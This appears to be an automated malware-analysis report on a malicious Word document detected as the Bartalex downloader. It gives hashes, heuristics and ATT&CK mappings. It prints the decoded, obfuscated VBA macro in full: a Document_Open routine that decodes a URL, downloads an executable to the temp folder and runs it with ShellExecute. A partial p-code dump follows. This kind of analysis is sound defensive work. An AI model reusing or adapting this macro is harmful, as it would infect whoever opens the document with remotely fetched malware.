Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c6de6ecc922589c7…

MALICIOUS

Office (OLE)

757.0 KB Created: 2015-06-23 04:55:00 Authoring application: Microsoft Office Word First seen: 2015-09-17
MD5: 16b37922cd0fbc39ebaf68025f074600 SHA-1: cd595f3c4a596b86067ca37db4a4453d6ec398d1 SHA-256: c6de6ecc922589c75c21c9cbe7619958cb0b33b965f6bc941b6d6ebb419627eb
258 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1190 Exploit Public-Facing Application

The sample contains VBA macros that utilize ShellExecute and URLDownloadToFile APIs, indicating an attempt to download and execute additional content. The document body, though heavily obfuscated, discusses financial transactions and impersonates a bank, suggesting a financial scam. The presence of the ClamAV detection 'Doc.Downloader.Bartalex-6755229-0' further supports its malicious nature as a downloader.

Heuristics 8

  • ClamAV: Doc.Downloader.Bartalex-6755229-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function ÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔ Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôó As Long, ByVal ûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéá As String, ByVal ÛâéÜÂíËïÜÔûÑÛïÇÉ …
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    ÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔ 0, ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ("fyf/nmn0fwjidsb.qx0ufo/fojhoffnpdojufosfuoj00;quui"), Environ("temp") & ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ("fyf/uofjmDUpX"), 0, 0
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# Referenced by macro
    • http://ns.adobe.com/tiff/1.0/Referenced by macro
    • http://ns.adobe.com/exif/1.0/Referenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://ns.adobe.com/xap/1.0/Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22679 bytes
SHA-256: dcd9e5fefa3b8444a5cec6908fe88b315fe2be6dff4bbcef4d13f28ef740cc7d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function ÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉéôëëêïÛéïËççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîé Lib "shell32.dll" Alias "ShellExecuteA" (ByVal ÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉ As Long, ByVal íÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑ As String, ByVal îÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀ As String, ByVal úôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéë As String, ByVal ÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉó As String, ByVal ñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜ As Long) As Long
Private Declare PtrSafe Function ÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔ Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôó As Long, ByVal ûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéá As String, ByVal ÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉë As String, ByVal ûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑ As Long, ByVal âçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈ As Long) As Long
Private Sub Document_Open()

ÇÀèËûëÇáùùçúùñÛïÜïÛâËùôêÉÈÑùúÑüâéÂúüàëééÛûíéÛóÀËËÊáûîûÜëêÈËÏÇÜîçóÂÈÉÂÉóÔÀÏÀéáçâÎîËôÀÉÀÎÈüóëÏéÔÉéÇíèÑ
End Sub
Private Function ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ(îËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùï)
    Dim íéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñ, ÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊç, íâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈî
ÑÎÈÏëÇÇñúÉíëÈùàéíééñàîÏÑáÀÑùùüÉüËÏèÏÉñçàÈÑûëèûéÔÀèùóéïôÑôÂËûÔèèéëáóÜÉóñâèêàÉúáûÛâÇÛçûïÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉ = Len(îËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùï)
For éôëëêïÛéïËççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîéÇÂüÊñüóÛùûñóÔÂâÏÜÊáâëÛÎÉÉÈÎôêôÉÀéÂÉËÀÉÂàíÏÂúÏÇíÑËËùâÎàïÊêÉîùúÎÊÂóíèËâêçùÀáçéôÈÀÜ = ÑÎÈÏëÇÇñúÉíëÈùàéíééñàîÏÑáÀÑùùüÉüËÏèÏÉñçàÈÑûëèûéÔÀèùóéïôÑôÂËûÔèèéëáóÜÉóñâèêàÉúáûÛâÇÛçûïÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉ To 1 Step -1
     ÜÂíËàéíééñàîÏÑáÀÑùùüÉüËÏèÏÉñçàÈÑûëèûéÔÀèùóéïôÑôÂËûÔèèéëáóÜÉóñâèêàÉúáûÛâÇÛçûïÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉéôëëêïÛéïË = Mid(îËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùï, éôëëêïÛéïËççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîéÇÂüÊñüóÛùûñóÔÂâÏÜÊáâëÛÎÉÉÈÎôêôÉÀéÂÉËÀÉÂàíÏÂúÏÇíÑËËùâÎàïÊêÉîùúÎÊÂóíèËâêçùÀáçéôÈÀÜ, 1)
     ççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîéÇÂüÊñüóÛùûñóÔÂâÏÜÊáâëÛÎÉÉÈÎôêôÉÀéÂÉËÀÉÂàíÏÂúÏÇíÑËËùâÎàïÊêÉîùúÎÊÂóíèËâêçùÀáçéôÈÀÜîÎÛûîâáüüú = ççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîéÇÂüÊñüóÛùûñóÔÂâÏÜÊáâëÛÎÉÉÈÎôêôÉÀéÂÉËÀÉÂàíÏÂúÏÇíÑËËùâÎàïÊêÉîùúÎÊÂóíèËâêçùÀáçéôÈÀÜîÎÛûîâáüüú & ÜÂíËàéíééñàîÏÑáÀÑùùüÉüËÏèÏÉñçàÈÑûëèûéÔÀèùóéïôÑôÂËûÔèèéëáóÜÉóñâèêàÉúáûÛâÇÛçûïÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉéôëëêïÛéïË
Next
 For ÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊç = 1 To Len(ççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîéÇÂüÊñüóÛùûñóÔÂâÏÜÊáâëÛÎÉÉÈÎôêôÉÀéÂÉËÀÉÂàíÏÂúÏÇíÑËËùâÎàïÊêÉîùúÎÊÂóíèËâêçùÀáçéôÈÀÜîÎÛûîâáüüú)
        íéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñ = Mid(ççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîéÇÂüÊñüóÛùûñóÔÂâÏÜÊáâëÛÎÉÉÈÎôêôÉÀéÂÉËÀÉÂàíÏÂúÏÇíÑËËùâÎàïÊêÉîùúÎÊÂóíèËâêçùÀáçéôÈÀÜîÎÛûîâáüüú, ÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊç, 1)
        íâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈî = íâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈî & Chr(Asc(íéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñ) - 1)
    Next
    ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ = íâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈî
End Function
Private Sub ÇÀèËûëÇáùùçúùñÛïÜïÛâËùôêÉÈÑùúÑüâéÂúüàëééÛûíéÛóÀËËÊáûîûÜëêÈËÏÇÜîçóÂÈÉÂÉóÔÀÏÀéáçâÎîËôÀÉÀÎÈüóëÏéÔÉéÇíèÑ()
ÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔ 0, ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ("fyf/nmn0fwjidsb.qx0ufo/fojhoffnpdojufosfuoj00;quui"), Environ("temp") & ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ("fyf/uofjmDUpX"), 0, 0
ÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉéôëëêïÛéïËççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîé 0, "open", Environ$("tmp") & ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ("fyf/uofjmDUpX"), "", vbNullString, vbNormalFocus
End Sub

Attribute VB_Name = "NewMacros"
Sub dfghj()
'
' dfghj Macro
'
'

End Sub

' Processing file: /opt/analyzer/scan_staging/569d0bcced794986890062d4273d79d9.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7512 bytes
' Line #0:
' 	FuncDefn (Function _B_var_ÜÜîàçÜÂÔËÉêÔûêÛïÇééÉÉÀËúùíùóéûèçÔùïéÀÎéÏüêëÎÏúïÑÈóÂÊÑâüÇûÀûÇèàèñïÔôûÂîíôÉËÈïáÈôËóÇÂêÜÇÉéÀàûçêáÇÀïÏËàÇÑàÜêîÉÜÔèùîóçÇüëéÑÉééá(ByVal ÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉéôëëêïÛéïËççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîé As Long) As Long)
' Line #1:
' 	FuncDefn (Function ñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜ(ByVal ÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔ As Long) As Long)
' Line #2:
' 	FuncDefn (Sub Document_Open())
' Line #3:
' Line #4:
' 	ArgsCall âçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈ 0x0000 
' Line #5:
' 	EndSub 
' Line #6:
' 	FuncDefn (Function ÇÀèËûëÇáùùçúùñÛïÜïÛâËùôêÉÈÑùúÑüâéÂúüàëééÛûíéÛóÀËËÊáûîûÜëêÈËÏÇÜîçóÂÈÉÂÉóÔÀÏÀéáçâÎîËôÀÉÀÎÈüóëÏéÔÉéÇíèÑ(ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ))
' Line #7:
' 	Dim 
' 	VarDefn îËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùï
' 	VarDefn íéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñ
' 	VarDefn ÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔûÑÛïÇÉéÉÏèËÊç
' Line #8:
' 	Ld ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ 
' 	FnLen 
' 	St íâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈî 
' Line #9:
' 	StartForVariable 
' 	Ld ÑÎÈÏëÇÇñúÉíëÈùàéíééñàîÏÑáÀÑùùüÉüËÏèÏÉñçàÈÑûëèûéÔÀèùóéïôÑôÂËûÔèèéëáóÜÉóñâèêàÉúáûÛâÇÛçûïÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉ 
' 	EndForVariable 
' 	Ld íâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈî 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	UMi 
' 	ForStep 
' Line #10:
' 	Ld ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ 
' 	Ld ÑÎÈÏëÇÇñúÉíëÈùàéíééñàîÏÑáÀÑùùüÉüËÏèÏÉñçàÈÑûëèûéÔÀèùóéïôÑôÂËûÔèèéëáóÜÉóñâèêàÉúáûÛâÇÛçûïÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉ 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St éôëëêïÛéïËççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîéÇÂüÊñüóÛùûñóÔÂâÏÜÊáâëÛÎÉÉÈÎôêôÉÀéÂÉËÀÉÂàíÏÂúÏÇíÑËËùâÎàïÊêÉîùúÎÊÂóíèËâêçùÀáçéôÈÀÜ 
' Line #11:
' 	Ld ÜÂíËàéíééñàîÏÑáÀÑùùüÉüËÏèÏÉñçàÈÑûëèûéÔÀèùóéïôÑôÂËûÔèèéëáóÜÉóñâèêàÉúáûÛâÇÛçûïÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉéôëëêïÛéïË 
' 	Ld éôëëêïÛéïËççÀêîçËéíáùçÉôèÀÎïïààÊéÜÈÉÈÜïÉïîéÇÂüÊñüóÛùûñóÔÂâÏÜÊáâëÛÎÉÉÈÎôêôÉÀéÂÉËÀÉÂàíÏÂúÏÇíÑËËùâÎàïÊêÉîùúÎÊÂóíèËâêçùÀáçéôÈÀÜ 
' 	Concat 
' 	St ÜÂíËàéíééñàîÏÑáÀÑùùüÉüËÏèÏÉñçàÈÑûëèûéÔÀèùóéïôÑôÂËûÔèèéëáóÜÉóñâèêàÉúáûÛâÇÛçûïÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉéôëëêïÛéïË 
' Line #12:
' 	StartForVariable 
' 	Next 
' Line #13:
' 	StartForVariable 
' 	Ld íéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñ 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ÜÂíËàéíééñàîÏÑáÀÑùùüÉüËÏèÏÉñçàÈÑûëèûéÔÀèùóéïôÑôÂËûÔèèéëáóÜÉóñâèêàÉúáûÛâÇÛçûïÔëééîÀÏêÊèÎÔÇÔêâÂçÊëÂÊÇéàôÇÈáéÛËÎîûíÉéôëëêïÛéïË 
